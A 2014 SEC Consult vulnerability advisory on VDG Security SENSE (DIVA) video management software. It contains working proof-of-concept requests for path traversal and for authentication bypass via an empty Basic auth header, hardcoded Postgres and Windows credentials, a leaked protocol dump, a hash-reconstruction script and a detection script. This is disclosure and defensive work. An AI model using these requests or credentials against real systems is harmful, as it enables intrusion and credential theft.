Multiple critical vulnerabilities in VDG Security SENSE

SEC Consult Vulnerability Lab Security Advisory < 20141218-0 >

=======================================================================

title: Multiple critical vulnerabilities

product: VDG Security SENSE (formerly DIVA)

vulnerable version: 2.3.13

fixed version: unknown - no vendor confirmation

impact: critical

homepage: vdgsecurity.com

found: 2014-10-01

by: Stefan Viehböck

SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

 

Vendor description:

-------------------

"VDG Sense is our video management system (VMS). VDG Sense gives you control

of all live images and stored video data, in a user-friendly interface. Our

solution is based on an open platform, tailored to your specific needs and

requirements and ready to be integrated in any security solution."

Source: vdgsecurity.com/sense/

 

"DIVA is our former trademark, which we used to brand our video management

software and other VDG products. With the launch of our new trademark, VDG

Sense, we have rebranded the software to VDG Sense and promote it as such

from September 15, 2014. Other products, such as our servers, are available

under the label VDG."

Source: vdgsecurity.com/diva/

 

 

Business recommendation:

------------------------

Attackers are able to completely compromise the VDG SENSE server as they can

gain access at the system level. SENSE server can be used as an entry point

into the target infrastructure (lateral movement, privilege escalation).

 

It is highly recommended by SEC Consult not to use this software until a

thorough security review has been performed by security professionals and all

identified issues have been resolved.

 

Although the vendor does not respond to our mails any more, some

vulnerabilities seem to be fixed in the most recent version of SENSE (2.3.15).

It is assumed that further critical vulnerabilities exist.

 

 

Vulnerability overview/description:

-----------------------------------

1) Unauthenticated local file disclosure

Unauthenticated users can read arbitrary files from the filesystem with the

privileges of the "SYSTEM" operating system user. These files include

configuration files containing sensitive information such as clear text

passwords/password hashes which can be used in further attacks.

 

 

2) Authentication bypass / Clear text password disclosure

Some parts of the DIVA application are vulnerable to authentication bypass. This

allows attackers to update DIVA plugin configuration. Furthermore DIVA plugin

configurations can be read. This configuration includes clear text DIVA

administrator credentials, as DIVA plugins require access to such an account

for operation.

 

 

3) Insecure service configuration / Hardcoded default credentials - Postgres

The PostgreSQL database is offered via the network (TCP port 5432) and can be

accessed remotely using hardcoded credentials which can't be changed.

 

 

4) Hardcoded default credentials - Windows Users

Several local Windows users are created in the course of the DIVA setup. These

are used to run some of the DIVA services. These users can be used to log on to the

server running DIVA.

 

 

5) Critical information disclosure / User database leakage

After authentication with the DIVA (fat) client via the proprietary protocol

(TCP port 51410) the server returns the contents of the user database

to the client. This works regardless of whether the user has administrator

rights or not.

The user database (users.ini) contains all users and their password hashes.

This information is sufficient to log in as another user. An attacker does not

require knowledge about plain text passwords.

 

 

6) Use of plain text protocols

All DIVA communication transport channels (e.g. via TCP ports 80 and 51410) lack

encryption.

 

 

7) Buffer overflow vulnerabilities

The DIVA web service API (/webservice) is vulnerable to a stack based buffer

overflow when processing "AuthenticateUser" requests. Both the "user" and the

"password" parameter are vulnerable.

None of the DIVA modules are ASLR-enabled. An exploit that uses ROP to bypass

DEP has been implemented.

 

 

Proof of concept:

-----------------

1) Unauthenticated local file disclosure

Arbitrary files can be downloaded because of vulnerabilities in the proprietary

web server implementation. An example for x64 hosts:

http://<host>/images/../../../../Windows/SysWOW64/config/systemprofile/AppData/Roaming/Diva/Settings/users.ini

 

Interesting DIVA-specific files:

config/systemprofile/AppData/Roaming/Diva/Settings/users.ini (DIVA user database)

config/systemprofile/AppData/Roaming/Diva/DivaManager/DivaManager.ini (contains DIVA "master user")

config/systemprofile/AppData/Roaming/Diva/DivaManager/Plugins/ (DIVA plugin configurations)

[...]

 

2) Authentication bypass / Clear text password disclosure

Authentication for parts of the application can be bypassed by sending the HTTP

Authorization header containing a colon ":".

 

GET /plugins/divacal/getsettings?sessionkey= HTTP/1.1

Host: <host>

Authorization: Basic Og==

 

The response contains the plugin configuration for "divacal":

 

HTTP/1.1 200 OK
Date: Thu, 23 Okt 2014 10:46:28 GMT
Server: Diva HTTP Plugin 2.0
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Type: application/xml; charset=UTF-8
Content-Length: 1179

<?xml version="1.0" ?>
<?xml-stylesheet type="text/xsl" href="../../xml/settings.xsl" ?>
<settings>
  <name>DivaCal settings</name>
  <group>
    <id>0</id>
    <name>DIVA Connection</name>
    <singleinstance>yes</singleinstance>
    <showbuttons>yes</showbuttons>
    <subgroup>
[...]
      <setting>
        <id>1</id>
        <name>DIVAUsername</name>
        <type>string</type>
        <value>Administrator</value>
        <default>Administrator</default>
        <help>The username used to login to to the DIVA management server.</help>
      </setting>
      <setting>
        <id>2</id>
        <name>DIVAPassword</name>
        <type>password</type>
        <value>!DVadmin</value>
        <default>!DVadmin</default>
        <help>The password required to login to the DIVA management server.</help>
      </setting>
    </subgroup>
  </group>
</settings>

 

Other activated plugins can be queried via the following request:

GET /plugins/?sessionkey= HTTP/1.1

Host: <host>

Authorization: Basic Og==

 

 

Plugin settings can be updated as follows:

POST /plugins/http/updatesettings?sessionkey= HTTP/1.1

Host: <host>

Authorization: Basic Og==

Content-Length: 29

groupid=0&DocumentRoot=htdocs
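
A detection check for the two request patterns shown in 1) and 2), as an added example that is not part of the advisory: it flags ".." path segments (after percent-decoding) in requests to the DIVA web server and Basic Authorization headers whose decoded credentials are just ":" ("Og=="). The sample requests are constructed for the example, not captured traffic.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample requests (not captured traffic): the two advisory
# patterns, a normal Basic login and a benign image fetch for comparison.
SAMPLE_REQUESTS = [
    ("GET", "/images/../../../../Windows/SysWOW64/config/systemprofile"
            "/AppData/Roaming/Diva/Settings/users.ini", {}),
    ("GET", "/plugins/divacal/getsettings?sessionkey=",
            {"Authorization": "Basic Og=="}),
    ("POST", "/plugins/http/updatesettings?sessionkey=",
            {"Authorization": "Basic " + base64.b64encode(b"operator:s3cret").decode()}),
    ("GET", "/images/logo.png", {}),
]

# A '..' segment bounded by '/' (or by the start/end of the path).
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")

def has_traversal(path):
    """True if the path holds a '..' segment once percent-encoding and
    Windows backslashes are normalised; the query string is ignored."""
    clean = unquote(path.split("?", 1)[0]).replace("\\", "/")
    return TRAVERSAL.search(clean) is not None

def empty_basic_credentials(headers):
    """True if a Basic Authorization header decodes to an empty user and
    an empty password, i.e. the bare ':' ('Og==') used by the bypass."""
    scheme, _, blob = headers.get("Authorization", "").partition(" ")
    if scheme.lower() != "basic":
        return False
    try:
        decoded = base64.b64decode(blob.strip(), validate=True).decode("latin-1")
    except (ValueError, UnicodeDecodeError):
        return False  # malformed blob; not the ':' pattern
    user, sep, password = decoded.partition(":")
    return sep == ":" and user == "" and password == ""

def scan(requests):
    """Return (method, path, tags) for every request that matches a rule."""
    hits = []
    for method, path, headers in requests:
        tags = []
        if has_traversal(path):
            tags.append("path-traversal")
        if empty_basic_credentials(headers):
            tags.append("empty-basic-auth")
        if tags:
            hits.append((method, path, tags))
    return hits
```

Running scan(SAMPLE_REQUESTS) reports the traversal request and the "Og==" request only; the normal login and the image fetch pass.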

 

 

3) Insecure service configuration / Hardcoded default credentials - Postgres

The Postgres root user is as follows:

 

Username: root

Password: ArpaRomaWi

 

 

4) Hardcoded default credentials - Windows Users

The created Windows users are as follows:

 

Username: postgres

Password: !DVService

 

Username: NTP

Password: !DVService

 

 

5) Critical information disclosure / User database leakage

Below is an excerpt from the DIVA protocol communication (TCP port 51410):

    00000000  48 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 H....... ........ <- SERVER
    00000010  00 00 00 00 0d 00 00 20  01 00 02 20 03 00 00 20 .......  ... ... 
    00000020  06 00 11 00 32 2e 33 2e  31 33 00 00 02 00 00 20 ....2.3. 13..... 
    00000030  01 00 02 40 04 00 00 00  04 00 00 20 06 00 11 00 ...@.... ... ....
    00000040  44 69 76 61 20 73 65 72  76 65 72 00             Diva ser ver.
00000000  b8 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........     <- CLIENT
00000010  00 00 00 00 29 00 00 20  c9 00 02 40 05 00 00 20 ....)..  ...@...      Note: client sends passwordHash and digestHash
00000020  f6 01 01 40 61 64 6d 69  6e 69 73 74 72 61 74 6f ...@admi nistrato
00000030  72 00 00 00 09 00 00 20  f7 01 01 40 49 41 68 6b r......  ...@IAhk
00000040  43 72 33 61 68 7a 59 39  67 53 57 73 56 37 33 6b Cr3ahzY9 gSWsV73k
00000050  41 42 32 64 51 79 38 3d  00 00 00 00 0a 00 00 20 AB2dQy8= ....... 
00000060  fa 01 01 40 35 34 38 31  35 36 32 31 38 64 33 65 ...@5481 56218d3e
00000070  31 63 35 35 66 63 30 30  35 65 38 32 61 32 32 30 1c55fc00 5e82a220
00000080  61 34 63 30 00 00 00 00  02 00 00 20 05 00 11 40 a4c0.... ... ...@
00000090  02 00 00 00 03 00 00 20  0b 00 11 40 00 00 00 00 .......  ...@....
000000A0  00 00 00 00 02 00 00 20  0f 00 11 40 00 00 00 00 .......  ...@....
000000B0  02 00 00 20 02 00 11 40  00 00 00 00             ... ...@ ....
    0000004C  30 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 0....... ........ <- SERVER
    0000005C  00 00 00 00 07 00 00 20  ca 00 02 40 02 00 00 20 .......  ...@... 
    0000006C  f5 01 01 40 01 00 00 00  02 00 00 20 02 00 11 40 ...@.... ... ...@
    0000007C  01 00 00 00                                      ....
000000BC  50 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 P....... ........     <- CLIENT
000000CC  00 00 00 00 0f 00 00 20  01 00 1c 40 0b 00 00 20 .......  ...@... 
000000DC  02 00 1c 40 47 45 54 20  2f 75 73 65 72 6d 61 6e ...@GET  /userman
000000EC  61 67 65 6d 65 6e 74 2f  6f 73 64 73 74 79 6c 65 agement/ osdstyle
000000FC  73 20 44 49 56 41 2f 31  2e 30 00 00 01 00 00 20 s DIVA/1 .0..... 
0000010C  03 00 1c 40                                      ...@
    00000080  24 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 $....... ........ <- SERVER
    00000090  00 00 00 00 04 00 00 20  07 01 11 40 02 00 00 20 .......  ...@... 
    000000A0  06 00 11 00 00 00 00 00  24 00 00 00 00 00 00 00 ........ $.......
[...]
    00000200  9c 02 01 40 02 00 00 20  06 00 11 00 0d 0a 00 00 ...@...  ........
    00000210  bc 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
    00000220  00 00 00 00 2a 00 00 20  f4 01 01 40 28 00 00 20 ....*..  ...@(.. 
    00000230  06 00 11 00 5b 61 64 6d  69 6e 69 73 74 72 61 74 ....[adm inistrat -----
    00000240  6f 72 5d 0d 0a 61 64 6d  69 6e 72 69 67 68 74 73 or]..adm inrights |
    00000250  3d 31 0d 0a 61 6e 64 72  6f 69 64 3d 0d 0a 64 69 =1..andr oid=..di |
    00000260  67 65 73 74 48 61 73 68  3d 35 34 38 31 35 36 32 gestHash =5481562 |
    00000270  31 38 64 33 65 31 63 35  35 66 63 30 30 35 65 38 18d3e1c5 5fc005e8 |
    00000280  32 61 32 32 30 61 34 63  30 0d 0a 65 6d 61 69 6c 2a220a4c 0..email | <- DIVA user database
    00000290  3d 0d 0a 66 75 6c 6c 6e  61 6d 65 3d 0d 0a 69 6f =..fulln ame=..io |
    000002A0  73 3d 0d 0a 70 61 73 73  77 6f 72 64 3d 49 41 68 s=..pass word=IAh |
    000002B0  6b 43 72 33 61 68 7a 59  39 67 53 57 73 56 37 33 kCr3ahzY 9gSWsV73 |
    000002C0  6b 41 42 32 64 51 79 38  3d 0d 0a 0d 0a 00 00 00 kAB2dQy8 =....... -----
    000002D0  24 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 $....... ........

 

For the sake of completeness the password hashing scheme has been reverse

engineered. As both hashes can be used for authentication directly, brute

force attacks against password hashes are not required.

#!/usr/bin/env python3
import hashlib
from base64 import b64encode

user = 'administrator'
password = '!DVadmin'

# digestHash: MD5 over "user:DIVA:password", hex-encoded and upper-cased
digestHash = hashlib.md5((user + ":DIVA:" + password).encode()).hexdigest().upper()
# passwordHash: base64 of SHA-1 applied twice to the raw password; no salt is
# used, so identical passwords always yield identical hashes
passwordHash = b64encode(hashlib.sha1(hashlib.sha1(password.encode()).digest()).digest()).decode()

print('digestHash', digestHash)
print('passwordHash', passwordHash)

 

6) Use of plain text protocols

No proof of concept necessary.

 

 

7) Buffer overflow vulnerabilities

Detailed proof of concept exploits have been removed for this vulnerability.

 

 

 

Vulnerable / tested versions:

-----------------------------

The vulnerabilities have been verified to exist in 2.3.13, which was the most

recent version at the time of discovery.

 

 

 

Vendor contact timeline:

------------------------

2014-10-24: Sending responsible disclosure policy and requesting encryption

keys.

2014-10-28: Vendor responds, provides encryption keys.

2014-10-29: Sending advisory and proof of concept exploit via encrypted

channel.

2014-10-29: Vendor confirms receipt of advisory.

2014-11-10: Requesting status update.

2014-11-17: Vendor states that team is "very well on track to solve the

issues".

2014-11-18: Clarifying criticality of vulnerabilities and viability of attack,

even in closed networks; referring to Shodan search results.

2014-12-10: Requesting status update. No reply.

2014-12-18: SEC Consult releases security advisory.

 

 

Solution:

---------

It seems some of the vulnerabilities are fixed in the most recent version of

SENSE (2.3.15). The vendor stopped responding to our emails so we don't know

what vulnerabilities were actually fixed.

 

 

Workaround:

-----------

No workaround available.

 

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

 

SEC Consult

Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

 

Headquarter:

Mooslackengasse 17, 1190 Vienna, Austria

Phone: +43 1 8903043 0

Fax: +43 1 8903043 15

 

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

 

Interested in working with the experts of SEC Consult?

Write to career@sec-consult.com

 

EOF Stefan Viehböck / @2014